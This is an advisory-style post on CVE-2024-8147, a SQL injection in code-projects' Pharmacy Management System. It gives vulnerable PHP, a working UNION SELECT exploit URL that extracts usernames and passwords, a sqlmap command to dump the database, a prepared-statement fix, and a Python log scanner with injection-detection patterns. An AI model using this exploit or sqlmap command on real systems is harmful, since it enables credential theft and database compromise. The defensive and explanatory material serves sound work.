CVE-2024-8147 - Critical SQL Injection in Pharmacy Management System 1. (code-projects) - Exploit and Details
Summary:
A critical vulnerability, CVE-2024-8147, has been found in code-projects' Pharmacy Management System 1. It is a classic SQL injection that lets an attacker take full control of the database, including reading sensitive information, modifying data, and in some environments even achieving remote code execution.
This post explains the vulnerability, shows code samples and a working exploit, and makes clear what needs to be fixed.
- Software affected: Pharmacy Management System 1. (code-projects)
- Vulnerable file: /index.php?action=editPharmacist
- Type: SQL Injection
- CVE: CVE-2024-8147
What Happened?
In the Pharmacy Management System 1. web application, the pharmacist edit page /index.php?action=editPharmacist reads the id parameter from the URL and places it directly into an SQL query, with no sanitization or parameterization.
This means an attacker can tamper with the id parameter and run their own SQL commands.
The vulnerable code follows a pattern that is common in PHP applications:
<?php
// Example: edit pharmacist
include("config.php");
$id = $_GET['id']; // user input, never validated
$query = "SELECT * FROM pharmacists WHERE id = $id"; // $id is interpolated straight into the SQL string: the injection point
$result = mysqli_query($conn, $query);
// ...
?>
The problem:
The $id value from the URL is placed into the SQL query string as-is. If someone sets id to something like 1 OR 1=1, the WHERE clause is true for every row and the whole table is exposed.
How to Exploit It (Proof of Concept)
An attacker can exploit the flaw by sending a specially crafted HTTP GET request.
Simple Exploit Example
Let's say the application is hosted at http://localhost/pharmacy/.
Malicious URL
http://localhost/pharmacy/index.php?action=editPharmacist&id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--
- id=1 is legitimate
- UNION SELECT 1,username,password,4,5 FROM users-- injects a second SELECT and returns user credentials
sqlmap can fully automate this:
python3 sqlmap.py -u "http://localhost/pharmacy/index.php?action=editPharmacist&id=1" --cookie="PHPSESSID=..." --risk=3 --batch
This can dump the whole database, including passwords.
Public Disclosure & References
- Original Project
- CVE record (when published)
- Exploit Database entry (if available)
- SQL Injection Explanation (OWASP)
How to Fix
You must parameterize all SQL queries. Here is a correct example using prepared statements in PHP:
<?php
include("config.php"); // provides $conn (mysqli)
$id = $_GET['id'];
// The query text is fixed; the value is sent separately and can never change the SQL.
$stmt = $conn->prepare("SELECT * FROM pharmacists WHERE id = ?");
$stmt->bind_param("i", $id); // "i" binds as integer, so "1 OR 1=1" arrives as just 1
$stmt->execute();
$result = $stmt->get_result();
?>
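Because the id parameter on this endpoint should only ever be an integer, a defender can also find past probing in web server logs with a simple check. The following Python is an added example, not code from the original post or from the project: it scans constructed Apache-style access-log lines (addresses, paths and timestamps are made up) and flags editPharmacist requests whose id is not purely numeric.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2024:09:10:01 +0000] "GET /pharmacy/index.php?action=editPharmacist&id=7 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Aug/2024:09:10:07 +0000] "GET /pharmacy/index.php?action=editPharmacist&id=1%20OR%201%3D1 HTTP/1.1" 200 9870 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Aug/2024:09:10:12 +0000] "GET /pharmacy/index.php?action=editPharmacist&id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users-- HTTP/1.1" 200 4102 "-" "sqlmap/1.8"
10.0.0.5 - - [25/Aug/2024:09:11:44 +0000] "GET /pharmacy/index.php?action=listPharmacists HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Aug/2024:09:12:03 +0000] "GET /pharmacy/index.php?action=editPharmacist&id=abc HTTP/1.1" 500 312 "-" "Mozilla/5.0"
"""

# Apache combined log format: client IP, timestamp, quoted request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# SQL keywords and comment markers that a legitimate integer id never contains.
# Only consulted after a value has already failed the "digits only" check.
SQL_TOKENS = re.compile(r"\b(union|select|or|and|sleep|benchmark)\b|--|/\*|'", re.I)

def classify_id(raw_id):
    """Return None for a well-formed numeric id, otherwise a short reason string."""
    if re.fullmatch(r"\d+", raw_id):
        return None                      # what the application should accept
    if SQL_TOKENS.search(raw_id):
        return "sql-injection-pattern"   # SQL syntax inside an integer field
    return "non-numeric-id"              # malformed; worth a look but not conclusive

def scan_log(text):
    """Return (ip, timestamp, status, decoded_id, reason) for suspicious editPharmacist requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if not url.path.endswith("/index.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if qs.get("action", [""])[0] != "editPharmacist":
            continue
        raw_id = qs.get("id", [""])[0]
        reason = classify_id(raw_id)
        if reason:
            findings.append((m["ip"], m["ts"], int(m["status"]), raw_id, reason))
    return findings

if __name__ == "__main__":
    for ip, ts, status, raw_id, reason in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} reason={reason} id={raw_id!r}")
```

A 200 response to an injected id (as in the second and third sample lines) is the signal that the unpatched query actually executed, so those hits are the ones to triage first.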
Stay up to date with CVEs and vulnerability advisories.
Thanks for reading! Stay secure and check your code for these classic mistakes.
Timeline
Published on: 08/25/2024 09:15:04 UTC
Last modified on: 09/11/2024 18:37:20 UTC